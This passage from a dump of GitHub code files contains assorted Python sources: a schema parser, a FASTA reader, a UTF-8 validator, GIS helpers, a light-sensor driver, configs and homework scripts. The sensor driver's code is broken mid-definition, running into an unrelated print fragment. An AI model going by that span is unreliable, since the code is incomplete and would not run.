raw_testing_data = pd.read_csv(SAVED_RAW_TESTING_DATA)\r\n else:\r\n print (f'read testing data from {TESTING_SET_PATH}')\r\n raw_testing_data = process_source_folder(TESTING_SET_PATH)\r\n raw_testing_data.to_csv(SAVED_RAW_TESTING_DATA)\r\n for topic in raw_testing_data['topic'].unique():\r\n count = len(raw_testing_data[raw_testing_data['topic']==topic])\r\n print(f'{topic}: count: {count}')\r\n return raw_traning_data,raw_testing_data","repo_name":"woodychang0611/Ai_Cup_2020","sub_path":"load_data_set.py","file_name":"load_data_set.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38504390215","text":"\"\"\"\nCREATED AT 4/24/14 11:10 AM AS A PART OF Project DBSC\n\"\"\"\n\nfrom ply import yacc, lex\n\ntokens = ('NAME', 'REF', 'PRI', 'LP', 'RP', 'LSP', 'RSP', 'LCP', 'RCP', 'COMMA')\nt_NAME = r\"[A-Za-z0-9_]+\"\nt_REF = r\"\\*\"\nt_PRI = r\"\\+\"\nt_LP = r'\\('\nt_RP = r'\\)'\nt_LSP = r'\\['\nt_RSP = r\"\\]\"\nt_LCP = r'\\{'\nt_RCP = r'\\}'\nt_COMMA = r','\nt_ignore = ' \\n\\r\\tS;'\ndef t_error(t):\n print('Lexing Err @', t)\n\n\n# CREATE IF NOT EXISTS ...\ndef p_schema(p):\n \"\"\" schema : cine\n | schema cine\n \"\"\"\n if len(p) is 2:\n p[0] = [p[1]]\n else:\n p[0] = p[1] + [p[2]]\n\n\n# cine, CREATE TABLE IF NOT EXISTS\ndef p_cine(p):\n \"\"\" cine : term LCP terms RCP \"\"\"\n # cine 是一个 term - terms 对\n p[0] = (p[1], p[3])\n\n\ndef p_type(p):\n \"\"\" type : NAME LP terms RP \"\"\"\n # type 是一个 NAME - terms 对\n p[0] = (p[1], p[3])\n\n\ndef p_term(p):\n \"\"\" term : NAME\n | REF term\n | PRI term\n | term LSP type RSP\n \"\"\"\n # term是一个四元组\n # (NAME, isPrimary, isForeign, type/None)\n if len(p) is 2:\n p[0] = (p[1], False, False, None)\n if len(p) is 3:\n if p[1] is '+':\n p[0] = (p[2][0], True, p[2][2], None)\n if p[1] is '*':\n p[0] = (p[2][0], p[2][1], True, None)\n if len(p) is 5:\n p[0] = (p[1][0], p[1][1], p[1][2], p[3])\n\n\ndef p_terms(p):\n \"\"\" terms : term\n | terms COMMA\n | terms COMMA term\n \"\"\"\n # terms 是一或多个 term 构成的 list\n if len(p) is 2:\n p[0] = [p[1]]\n if len(p) is 3:\n p[0] = p[1]\n if len(p) is 4:\n p[0] = p[1] + [p[3]]\n\n\ndef parse(filename):\n lexer = lex.lex()\n parser = yacc.yacc()\n with open(filename) as file:\n schema = file.read()\n r = parser.parse(schema, debug=0)\n return 
r\n","repo_name":"EizoAssik/DB-ExCr","sub_path":"initial_tables/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72553896232","text":"import sys\ninput = sys.stdin.readline\n\nK, N = map(int,input().split())\nlenson = []\nfor _ in range(K):\n lenson.append(int(input()))\n\nstart, end = 1, max(lenson)\n\nwhile start <= end:\n mid = (start + end) // 2\n count = 0\n for son in lenson:\n count += son // mid\n if count >= N:\n start = mid + 1\n else:\n end = mid - 1\nprint(end)","repo_name":"jayyeong/Algorithm","sub_path":"Baekjoon/BOJproblem_5May/BOJ1654랜선자르기.py","file_name":"BOJ1654랜선자르기.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29179849535","text":"import re\nimport StringIO\n\n\nclass fasta(object):\n \"\"\"Create a fasta file object::\n\n f = fasta(filename_or_data,[ mode=\"r\",[ parse=True]])\n\n The API for the fasta file object closely follows the interface of the\n standard python file object.\n\n The mode can be one of:\n\n * 'r' - reading (default)\n * 's' - string data\n * 'f' - file object\n * 'a' - append\n * 'w' - write\n\n The file will be created if it doesn't exist for writing or appending; it\n will be truncated when opened for reading.\n\n For read mode, universal newline support is automatically invoked.\n\n By default, each FASTA entry is parsed into a dict with 'name' and\n 'sequence' values (parse=True). For 'raw' strings, set parse=False.\n \"\"\"\n\n __parse = True\n\n def __get_parse(self):\n return self.__parse\n\n def __set_parse(self, value):\n if not isinstance(value, bool):\n raise ValueError(\"'%s' is not a boolean.\" % value)\n self.__parse = value\n\n parse = property(fget=__get_parse,\n fset=__set_parse,\n doc=\"parse entry into dict (default=True)\")\n\n __mode = None\n\n def __get_mode(self):\n return self.__mode\n\n mode = property(fget=__get_mode,\n doc=\"file mode ('r', 's', 'f', 'w', or 'a')\")\n\n def __get_closed(self):\n return self.__fobj.closed\n\n closed = property(fget=__get_closed,\n doc=\"True if the file is closed\")\n\n __fobj = None\n __buff = 'x' # needs to be initialized with non-zero, non-'>' character\n\n def __init__(self, filename_or_data, mode='r', parse=True):\n \"\"\"x.__init__(...) initializes x\n\n see x.__class__.__doc__ for signature\"\"\"\n\n if mode[0] in ['r', 'a', 'w']:\n if mode == 'r':\n # force universal read mode\n mode = 'rU'\n self.__fobj = open(filename_or_data, mode)\n elif mode == 'f':\n self.__fobj = filename_or_data\n elif mode == 's':\n self.__fobj = StringIO.StringIO(filename_or_data)\n else:\n msg = \"mode string must start with 'r', 'a', 'w', 'f' or 's', \\\n not '%s'\" % mode[0]\n raise ValueError(msg)\n self.__mode = mode\n self.parse = parse\n\n def __iter__(self):\n \"\"\"x.__iter__() <==> iter(x)\"\"\"\n return self\n\n def __enter__(self):\n \"\"\"__enter__() -> self.\"\"\"\n return self\n\n def __exit__(self, type, value, traceback):\n \"\"\"__exit__(*excinfo) -> None. Closes the file.\"\"\"\n self.__fobj.close()\n\n def close(self):\n \"\"\"close() -> None or (perhaps) an integer. Close the file.\"\"\"\n return self.__fobj.close()\n\n def flush(self):\n \"\"\"flush() -> None. 
Flush the internal I/O buffer.\"\"\"\n return self.__fobj.flush()\n\n def next(self):\n \"\"\"next() -> the next entry, or raise StopIteration\"\"\"\n nxt = self.readentry()\n if nxt is None:\n self.__fobj.close()\n raise StopIteration\n return nxt\n\n def read(self):\n \"\"\"read() -> list of dict entries, reads the remainder of the data.\n\n Equivalent to readentries().\"\"\"\n return self.readentries()\n\n def readentry(self):\n \"\"\"readentry() -> next entry, as a dict.\n\n Return None at EOF.\"\"\"\n # read until the start of the next entry\n while not self.__buff.startswith('>'):\n self.__buff = self.__fobj.readline()\n if self.__buff == '':\n # EOF\n return None\n\n current = []\n current.append(self.__buff)\n self.__buff = self.__fobj.readline()\n while not self.__buff.startswith('>') and self.__buff != '':\n current.append(self.__buff)\n self.__buff = self.__fobj.readline()\n\n current_str = ''.join(current)\n if self.parse:\n return parse_fasta(current_str)\n return(current_str)\n\n def readentries(self):\n \"\"\"readentries() -> list of entries, each a dict.\n\n Call readentry() repeatedly and return a list of the entries read.\"\"\"\n return list(x for x in self)\n\n def write(self, entry, wrap_at=80, endline='\\n'):\n \"\"\"write(entry) -> None. Write entry dict to file.\n\n argument dict 'entry' must have keys 'name' and 'sequence', both\n with string values.\"\"\"\n if 'name' in entry and 'sequence' in entry:\n self.__fobj.write(entry2str(entry, wrap_at, endline))\n else:\n raise ValueError('entry missing either name or sequence')\n\n def write_entries(self, entries):\n \"\"\"write_entries(entries) -> None. Write list of entries to file.\n\n The equivalent of calling write for each entry.\"\"\"\n for entry in entries:\n self.write(entry)\n\n\ndef parse_fasta(entry):\n \"\"\"parse_fasta(entry) -> dict. entry is a string.\n\n Parse a string representation of a single FASTA entry into a dict.\n The returned dict has values for 'name' and 'sequence'.\"\"\"\n if not entry.startswith('>'):\n raise TypeError(\"entry does not start with '>'\")\n\n # the entry must include at least two lines (a label and a sequence)\n lines = re.split(r'[\\r\\n]+', entry)\n if len(lines) < 2:\n raise TypeError(\"entry needs at least two lines\")\n\n # name is everything on the first line after the '>'\n name = lines.pop(0)[1:].strip()\n # sequence is the rest of the entry\n sequence = ''.join(lines)\n\n return {'name': name, 'sequence': sequence}\n\n\ndef entry2str(entry, wrap_at=80, endline='\\n'):\n \"\"\"entry2str(entry[, wrap_at[, endline]]) -> a string. entry is a dict.\n\n Given an entry dict with string values for 'name' and 'sequence', will\n return a string in FASTA format. 'endline's (default \\\\n) will be inserted\n into the sequence every 'wrap_at' characters (default 80).\"\"\"\n s = []\n s.append('>%s%s' % (entry['name'], endline))\n # for the wrapping, DON'T use 'textwrap.wrap'. 
It is very slow because\n # it tries to be clever and find word breaks to wrap at.\n exploded_seq = list(entry['sequence'])\n wrap_points = range(0, len(exploded_seq), wrap_at)\n wrap_points.reverse()\n for i in wrap_points[:-1]:\n exploded_seq.insert(i, '\\n')\n s = s + exploded_seq + ['\\n']\n return ''.join(s)\n","repo_name":"ryanraaum/oldowan.fasta","sub_path":"oldowan/fasta/fasta.py","file_name":"fasta.py","file_ext":"py","file_size_in_byte":6337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"70000644392","text":"#!/usr/bin/python3\n\"\"\"Module that determines if a given data set represents a valid\"\"\"\nimport codecs\n\n\ndef validUTF8(data):\n \"\"\"Determines if a given data set represents a valid\n UTF-8 encoding\"\"\"\n for unit_data in data:\n if not (0 <= unit_data < 256):\n return False\n\n byte_data = bytes([unit_data])\n try:\n codecs.decode(byte_data, 'utf-8', errors='strict')\n except UnicodeDecodeError:\n return False\n\n return True\n","repo_name":"Ranci-18/alx-interview","sub_path":"0x04-utf8_validation/0-validate_utf8.py","file_name":"0-validate_utf8.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11553699762","text":"# encoding: utf-8\n\"\"\"\nSummary: small tools for spatial operation\n\"\"\"\nfrom django.contrib.gis.geos import LineString\nfrom django.contrib.gis.gdal import DataSource\nimport math\nfrom osgeo import ogr\n\ndef roadSegmentToText(lineString, direction = True):\n \"\"\"\n convert the lineString of the road segment into text description\n \n input:\n lineString: describes the road segement\n direction: boolean variable indicating the direction\n True means same direction as lineString\n False means reverse direction as lineString\n return:\n a string including the text description\n \"\"\" \n sPt = lineString.coords[0]\n ePt = lineString.coords[-1]\n \n if direction is not True:\n temp = ePt\n ePt = sPt\n sPt = temp\n \n orientation = math.atan2(ePt[1] - sPt[1], ePt[0] - sPt[0]) \n distance = lineString.length\n \n #determine orientation\n if orientation >= -math.pi / 4 and orientation < math.pi / 4:\n orientation = '东'\n \n elif orientation >= math.pi / 4 and orientation < 3 * math.pi / 4:\n orientation = '北'\n \n elif orientation >= 3 * math.pi / 4 and orientation < math.pi:\n orientation = '西'\n \n else:\n orientation = '南'\n \n #generate text\n desc = '向 %(oriet)s 步行 %(dist)d 米' % {'oriet':orientation, 'dist':int(distance)} \n \n return desc\n\ndef multiLineStringToLineString(original, desc):\n \"\"\"\n convert a shape file with geometry type of multilinestring to a new \n shape file with geometry type of linestring\n input:\n original, the file path of multiplinestring shapefile\n desc, the file path of new linestring shapefile\n return \n None\n \"\"\"\n oriDs = DataSource(original)\n \n driverName = \"ESRI Shapefile\"\n drv = ogr.GetDriverByName( driverName ) \n newDs = drv.CreateDataSource(desc)\n \n layerName = \"split_road\"\n newLyr = newDs.CreateLayer(layerName, None, ogr.wkbLineString)\n field_defn = ogr.FieldDefn( \"Name\", ogr.OFTString ) \n field_defn.SetWidth( 32 )\n newLyr.CreateField ( field_defn )\n \n oriLyr = oriDs[0] \n for feat in oriLyr:\n geom = feat.geom\n for subGeom in geom:\n feat = ogr.Feature(newLyr.GetLayerDefn())\n newGeom = ogr.CreateGeometryFromWkt(subGeom.wkt)\n feat.SetGeometry(newGeom)\n newLyr.CreateFeature(feat)\n \n 
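# NOTE (editor's annotation): with the osgeo.ogr bindings, Destroy() is what flushes the\n # newly created features to disk and closes the shapefile handle; dropping the last\n # reference (newDs = None) has the same effect.\n 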
newDs.Destroy()","repo_name":"dynaturtle/xiao-personal-code","sub_path":"Python Demo/pkumap/route/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"26215593371","text":"# https://leetcode.com/problems/binary-search-tree-to-greater-sum-tree/\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def bstToGst(self, root: TreeNode) -> TreeNode:\n def traverse(root, arr):\n if root is None:\n return\n traverse(root.left, arr)\n arr.append(root)\n traverse(root.right, arr)\n\n arr = []\n traverse(root, arr)\n n = len(arr)\n for i in range(n - 1, 0, -1):\n arr[i - 1].val += arr[i].val\n return root\n","repo_name":"zhuli19901106/leetcode-zhuli","sub_path":"algorithms/1001-1500/1038_binary-search-tree-to-greater-sum-tree_1_AC.py","file_name":"1038_binary-search-tree-to-greater-sum-tree_1_AC.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":557,"dataset":"github-code","pt":"72"} +{"seq_id":"41745138032","text":"from flask.json import JSONEncoder\nfrom model.Movie import Movie\n\n\nclass MovieEncoder(JSONEncoder):\n def default(self, o):\n if isinstance(o, Movie):\n return {'id': o.id,\n 'title': o.title,\n 'description': o.description,\n 'genre_ids': o.genre_ids,\n 'imdb_rating': o.imdb_rating,\n 'tmdb_rating': o.tmdb_rating,\n 'release_date': o.release_date,\n 'imdb_url': o.imdb_url}\n return super(MovieEncoder, self).default(o)\n","repo_name":"qwertzasd/movie-recommender","sub_path":"utility/MovieEncoder.py","file_name":"MovieEncoder.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37393638109","text":"from micropython import const\nimport robotling_lib.misc.ansi_color as ansi\nfrom robotling_lib.sensors.sensor_base import SensorBase\n\nfrom robotling_lib.platform.platform import platform as pf\nif pf.languageID == pf.LNG_CIRCUITPYTHON:\n from robotling_lib.platform.circuitpython.register.i2c_struct \\\n import UnaryStruct, ROUnaryStruct\n from robotling_lib.platform.circuitpython.register.i2c_bits import RWBits\n from robotling_lib.platform.circuitpython.register.i2c_bit import RWBit, ROBit\n from robotling_lib.platform.circuitpython.bus_device.i2c_device \\\n import I2CDevice\nelse:\n print(ansi.RED +\"ERROR: No matching libraries in `platform`.\" +ansi.BLACK)\n\n# pylint: disable=bad-whitespace\n__version__ = \"0.1.0.0\"\nCHIP_NAME = \"VEML7700\"\nCHAN_COUNT = const(1)\n# pylint: enable=bad-whitespace\n\n# ----------------------------------------------------------------------------\nclass VEML7700(SensorBase):\n \"\"\"Driver for the VEML7700 ambient light sensor.\"\"\"\n\n # pylint: disable=bad-whitespace\n # Ambient light sensor gain settings\n ALS_GAIN_1 = const(0x0)\n ALS_GAIN_2 = const(0x1)\n ALS_GAIN_1_8 = const(0x2)\n ALS_GAIN_1_4 = const(0x3)\n\n # Ambient light integration time settings\n ALS_25MS = const(0xC)\n ALS_50MS = const(0x8)\n ALS_100MS = const(0x0)\n ALS_200MS = const(0x1)\n ALS_400MS = const(0x2)\n ALS_800MS = const(0x3)\n\n # Gain value integers\n gain_values = {\n ALS_GAIN_2: 2,\n ALS_GAIN_1: 1,\n ALS_GAIN_1_4: 0.25,\n ALS_GAIN_1_8: 0.125,\n }\n # Integration time value integers\n integration_time_values = {\n ALS_25MS: 25,\n ALS_50MS: 50,\n ALS_100MS: 100,\n ALS_200MS: 200,\n 
ALS_400MS: 400,\n ALS_800MS: 800,\n }\n # pylint: enable=bad-whitespace\n\n # ALS - Ambient light sensor high resolution output data\n light = ROUnaryStruct(0x04, \"12}] {1:35} ({2}): {3}\"\n .format(cn, self._type, __version__,\n \"ok\" if self._isReady else \"FAILED\") +ansi.BLACK)\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n def integration_time_value(self):\n \"\"\" Integration time value in integer form.\n Used for calculating :meth:`resolution`.\n \"\"\"\n integration_time = self.light_integration_time\n return self.integration_time_values[integration_time]\n\n def gain_value(self):\n \"\"\" Gain value in integer form. Used for calculating :meth:`resolution`.\n \"\"\"\n gain = self.light_gain\n return self.gain_values[gain]\n\n def resolution(self):\n \"\"\" Calculate the :meth:`resolution`` necessary to calculate lux. Based on\n integration time and gain settings.\n \"\"\"\n resolution_at_max = 0.0036\n gain_max = 2\n integration_time_max = 800\n if (\n self.gain_value() == gain_max and\n self.integration_time_value() == integration_time_max\n ):\n return resolution_at_max\n return (\n resolution_at_max\n *(integration_time_max /self.integration_time_value())\n *(gain_max /self.gain_value())\n )\n\n @property\n def lux(self):\n \"\"\" Light value in lux.\n \"\"\"\n return self.resolution() *self.light\n\n # - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n @property\n def is_ready(self):\n return self._isReady\n\n @property\n def channel_count(self):\n return CHAN_COUNT\n\n# ----------------------------------------------------------------------------\n","repo_name":"teuler/robotling_lib","sub_path":"sensors/lux_veml7700.py","file_name":"lux_veml7700.py","file_ext":"py","file_size_in_byte":5606,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"13890215029","text":"import os\n\n# Debug True/False\nDEBUG = False\n\n# Database connection\nDATABASE = 'bombolone'\n\n# ~\nENV = \"prod\"\n\n# ~\nPATH = 'http://www.bombolone.com'\n\n# ~\nPATH_API = 'http://www.bombolone.com'\n\n# ~\nPATH_LAYOUT = 'http://www.bombolone.com/static/layout/'\n\n# ~\nPROJECT_DIR = os.path.dirname(__file__)\n\n# ~\nPROJECT_STATIC_FILES = 'data/upload'\n\n# ~\nUP_FOLDER = os.path.join(PROJECT_DIR,'../../%s/' % PROJECT_STATIC_FILES)\n\n# ~\nUP_AVATARS_FOLDER = os.path.join(PROJECT_DIR,'../../%s/avatars/' % PROJECT_STATIC_FILES)\n\n# ~\nUP_IMAGE_FOLDER = os.path.join(PROJECT_DIR,'../../%s/images/' % PROJECT_STATIC_FILES)\n\n# ~\nPORT = 5000\n\n# ~\nSECRET_KEY = 'secret_key'\n\n# ~\nPORT_DATABASE = None\n\n# ~\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])\n\n# ~\nALLOWED_ALL_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])\n\n# ~\nEXTENSIONS = {'png' : 'PNG', 'jpg' : 'JPEG', 'jpeg' : 'JPEG', 'gif' : 'GIF'}\n\n# ~\nEXTENSIONS_REQUEST = {'png', 'jpg', 'jpeg', 'gif', 'css', 'js'}\n\n# activate user status\nACTIVATED = 1\n\n# not activate user status\nNOTACTIVATED = 0\n\n# ~\nJS_FILES_STEP_ONE = ['https://ajax.googleapis.com/ajax/libs/angularjs/1.2.13/angular.min.js',\n 'https://ajax.googleapis.com/ajax/libs/angularjs/1.2.13/angular-route.min.js']\n\n# ~\nJS_FILES_STEP_TWO = ['https://ajax.googleapis.com/ajax/libs/angularjs/1.2.13/angular-resource.min.js',\n '/static/js/lib/angular-ui.min.js']\n\n# ~\nCSS_BOOTSTRAP = 'https://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css'\n\n# ~\nCSS_FONT_AWESOME = 
'https://maxcdn.bootstrapcdn.com/font-awesome/4.1.0/css/font-awesome.min.css'\n","repo_name":"Opentaste/bombolone","sub_path":"bombolone/config_production.py","file_name":"config_production.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"72"} +{"seq_id":"132890509","text":"#!/usr/bin/python3\n\nimport argparse\nimport logging\nimport json\nfrom urllib.parse import urlparse\nimport yt.wrapper as yt\nimport time\n\n\ndef get_host(url):\n return urlparse('http://' + url).netloc\n\n\ndef compare(snail_results, mapping):\n urls_with_diff = []\n hosts_to_check = set()\n\n for item in snail_results:\n if item['status'] != 'OK':\n continue\n if not 'players' in item or len(item['players']) == 0:\n continue\n for player_id in item['players']:\n if player_id not in mapping[item['url']]:\n hosts_to_check.add(get_host(item['url']))\n urls_with_diff.append({'Url': item['url'], 'PlayerId': player_id})\n\n return urls_with_diff, hosts_to_check\n\n\ndef send_to_checker(faulty_hosts, incoming_directory_path):\n table = incoming_directory_path + '/clicks-crawling.' + str(int(time.time()))\n yt.write_table(table, [{'Host': host} for host in faulty_hosts])\n logging.info('Stored faulty hosts to {}'.format(table))\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n\n ap = argparse.ArgumentParser()\n ap.add_argument('--snail-results', required=True)\n ap.add_argument('--url-player-id-mapping', required=True)\n ap.add_argument('--check-incoming-directory', required=True)\n ap.add_argument('--output', required=True)\n args = ap.parse_args()\n\n snail_results = json.load(open(args.snail_results, 'r'))\n mapping = json.load(open(args.url_player_id_mapping, 'r'))\n\n faulty_urls, faulty_hosts = compare(snail_results, mapping)\n\n json.dump(faulty_urls, open(args.output, 'w'), indent=True)\n send_to_checker(faulty_hosts, args.check_incoming_directory)\n\n logging.info('Found {} URLs with unexpected players'.format(len(faulty_urls)))\n logging.info('{} hosts sent to checking'.format(len(faulty_hosts)))\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"extsearch/player_testing/clicks_crawling/compare-players.py","file_name":"compare-players.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70987928553","text":"import numpy as np\nimport prob as pr\nfrom info import coeffOfNo\n\ndef determBhv( dims, no=0):\n bhv = np.zeros( dims)\n bhv[ coeffOfNo( no, dims) ] = 1.0\n return bhv\n\ndef unifBhv( dims):\n bhv = np.ones( dims)\n bhv *= 1./np.sum( bhv)\n return bhv\n\ndef coin( p):\n return np.array( [p, 1.-p])\n\ndef randBhv( dims):\n bhv = np.random.rand( *dims)\n return pr.normalize( bhv)\n\n# Four partite distrib P_XYZU\ndef FourPDstrb():\n Ptable = np.zeros((4,4,2,2))\n Ptable[0,0,0,0] = Ptable[1,1,0,0] = Ptable[0,1,1,0] = Ptable[1,0,1,0] = 1.0/8.0\n Ptable[2,2,0,1] = Ptable[3,3,1,1] = 1.0/4.0\n return Ptable\n\n# Alternative implementation of the behavior above\ndef FourPDstrb2():\n P = np.zeros((4,4,2,2))\n for x in range(0,2):\n for y in range(0,2):\n P[x,y, (x+y)%2, x//2] = 1./8.\n for x in range(2,4):\n P[x, x, x%2, x//2] = 1./4.\n return P\n\ndef FourPDstrb3():\n P = np.zeros((4,4,16,2))\n for x in range(0,2):\n for y in range(0,2):\n P[x,y, (x+y)%2, x//2] = 1./8.\n for x in range(2,4):\n P[x, x, x%2, x//2] = 1./4.\n return P\n\ndef FourPDistribN(n=4):\n h = (n+1)//2\n P = 
np.zeros((n,n,h,h))\n for x in range(0,h):\n for y in range(0,h):\n P[x,y, (x+y)%h, x//h] = 1./(2*h*h)\n for x in range(h,n):\n P[x, x, x%h, x//h] = 1./n\n return P\n\ndef ThreePDstrb():\n P = np.zeros((4,4,16))\n for x in range(0,2):\n for y in range(0,2):\n P[x,y, (x+y)%2] = 1./8.\n for x in range(2,4):\n P[x, x, x%2] = 1./4.\n return P\n\ndef ThreePDstrbN(n=4):\n h = n//2\n P = np.zeros((n,n,n*n))\n for x in range(0,h):\n for y in range(0,h):\n P[x,y, (x+y)%h] = 1./(2*n*n)\n for x in range(h,n):\n P[x, x, x%h] = 1./n\n return P\n\n# Tripartite distribution given in Gisin, Wolf paper Example 3.bis\n# translated from \\psi = (1/sqrt(3))(|11> + |22> + |33>)\ndef ThreePDstrEx3(alpha=4):\n # for alpha <= 4 it seems that S(X;Y||Z) = 0\n # for alpha <= 3 I(X;Y|Z) = 0\n assert(alpha>=2)\n P = np.zeros((2,2,3))\n P[0,0,0] = P[1,1,0] = 2*(9/(2*alpha+4))\n P[0,0,2] = P[1,1,2] = alpha * 9/(2*alpha+4) * (2*alpha-5)/(2*alpha+4)\n P[1,0,0] = 2 * 2 * (2*alpha-5)/(2*alpha+4)\n P[1,0,1] = 5-alpha\n P[1,0,2] = alpha * (2*alpha-5)/(2*alpha+4) * (2*alpha-5)/(2*alpha+4)\n P[0,1,2] = alpha * 9/(2*alpha+4) * 9/(2*alpha+4)\n\n return pr.normalize(P)\n##########################################################\n\n# Four partite noise -> to be mixed with FourPDistrib\n# Is to yield as a marginal the candidate from 2003 paper\ndef ThreePNoise1():\n P = np.zeros((4,4,16))\n # Fill upper triangle\n for idx in [[0,2],[0,3],[1,2],[1,3]]:\n P[ idx[0], idx[1], idx[0]*4 + idx[1]] = 1\n P[ idx[1], idx[0], idx[1]*4 + idx[0]] = 1\n return pr.normalize(P)\n\ndef ThreePNoise1_():\n P = np.zeros((4,4,2))\n\n for idx in [[0,2],[0,3],[1,2],[1,3]]:\n P[ idx[0], idx[1], idx[0]%2] = 1\n P[ idx[1], idx[0], idx[1]%2] = 1\n return pr.normalize(P)\n\ndef ThreePNoise2():\n P = np.zeros((4,4,16))\n # Fill upper triangle\n for idx in [[0,0],[0,1],[1,0],[1,1],[0,2],[0,3],[1,2],[1,3]]:\n P[ idx[0], idx[1], idx[0]*4 + idx[1]] = 1\n P[ idx[1], idx[0], idx[1]*4 + idx[0]] = 1\n return pr.normalize(P)\n\ndef ThreePNoise2_():\n P = np.zeros((4,4,2))\n # Fill upper triangle\n for idx in [[0,0],[0,1],[1,0],[1,1],[0,2],[0,3],[1,2],[1,3]]:\n P[ idx[0], idx[1], idx[1]%2] = 1\n P[ idx[1], idx[0], idx[0]%2] = 1\n return pr.normalize(P) \n\ndef ThreePNoise3():\n P = np.zeros((4,4,16))\n for x in range(0, P.shape[0]):\n for y in range(0, P.shape[1]):\n P[ x, y, x*4 + y] = 1\n return pr.normalize(P) \n\ndef ThreePUniformNoise():\n P = np.ones((4,4,16))\n return pr.normalize(P)\n\ndef ThreePUniformNoise2():\n P = np.ones((4,4,2))\n return pr.normalize(P)\n\ndef redBhv(P):\n \"\"\"\n trace out all parties 4,5,.. 
so that only a tripartite\n behaviour is left\n \"\"\" \n l = len(P.shape)\n # t is () for l>=3\n t = tuple(np.arange(3,l))\n # np.sum does not change P for axis=()\n return np.sum(P,axis=t)\n","repo_name":"CrashingBrain/BSc_Project","sub_path":"coding/bhvs.py","file_name":"bhvs.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13329651396","text":"import os, glob\nimport cv2\nimport numpy as np\nimport time\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport csv\n\n\n\nclass data_preprocessing():\n def __init__(self, src_path, target_path,\n img_csv_name='img.csv', label_csv_name='label.csv'):\n\n self.src_path = src_path\n self.target_path = target_path\n self.img_csv_name = img_csv_name\n self.label_csv_name = label_csv_name\n\n # training data\n print('Preprocessing the training data...')\n self.create_des_csv_npz('train')\n\n # testing data\n print('Preprocessing the testing data...')\n self.create_des_csv_npz('test')\n\n def create_des_csv_npz(self, mode):\n # src path & target path\n cur_src_path = self.src_path + mode + '/'\n cur_target_path = self.target_path + mode + '/'\n if not os.path.exists(cur_target_path):\n os.makedirs(cur_target_path)\n\n print('Saving the ' + cur_target_path + self.img_csv_name)\n print('Saving the ' + cur_target_path + self.label_csv_name)\n\n # get all the dirs of labels\n dirs = glob.glob('{}*/'.format(cur_src_path))\n dirs.sort()\n\n # fps of csv\n fp_img = open(cur_target_path + self.img_csv_name, 'w')\n fp_label = open(cur_target_path + self.label_csv_name, 'w')\n\n # create csv & find all descriptor\n first = True\n\n for dir in dirs:\n label = dir[len(cur_src_path):-1]\n imgs = glob.glob('{}*.jpg'.format(dir + '/'))\n for img in imgs:\n fp_img.write(img[len(cur_src_path+label)+1:] + '\\n')\n fp_label.write(label + '\\n')\n\n fp_img.close()\n fp_label.close()\n\n\ndef tiny_img(img, size=(16, 16)):\n return cv2.resize(img, size, interpolation=cv2.INTER_AREA)\n\ndef compute_accuracy(y_pred, y_true):\n return np.sum(y_pred == y_true) / len(y_true)\n\ndef knn(train_img, train_label, test_img, test_label, k):\n correct = 0\n for img, label in zip(test_img, test_label):\n distances = pow(train_img - img, 2).sum(1) ** 0.5\n index = distances.argsort()\n neighbors = [train_label[idx] for idx in index[:k]]\n distances = [distances[idx] for idx in index[:k]]\n pred_label = get_label(neighbors, distances)\n if pred_label == label:\n correct += 1\n return correct * 100 / test_label.shape[0]\n\ndef get_label(neighbors, distances):\n labels = {}\n for label, distance in zip(neighbors, distances):\n if label in labels:\n labels[label] += 1. / distance\n else:\n labels[label] = 1. 
/ distance\n return max(labels.keys(), key=(lambda key: labels[key]))\n\nif __name__ == '__main__':\n # Prepare Data\n src_path = './hw5_data/'\n target_path = './script/'\n pre_data = data_preprocessing(src_path, target_path)\n\n with open(os.path.join(target_path, 'train/img.csv'), newline='') as csvfile:\n train_img = list(csv.reader(csvfile))\n with open(os.path.join(target_path, 'train/label.csv'), newline='') as csvfile:\n train_label = list(csv.reader(csvfile))\n with open(os.path.join(target_path, 'test/img.csv'), newline='') as csvfile:\n test_img = list(csv.reader(csvfile))\n with open(os.path.join(target_path, 'test/label.csv'), newline='') as csvfile:\n test_label = list(csv.reader(csvfile))\n\n n_train_data = len(train_img)\n\n imgs = []\n for path, label in zip(train_img, train_label):\n img = cv2.imread(os.path.join(src_path, 'train', label[0], path[0]), 0)\n img = tiny_img(img)\n imgs.append(img)\n\n x_train = np.array(imgs).reshape((n_train_data, -1))\n y_train = 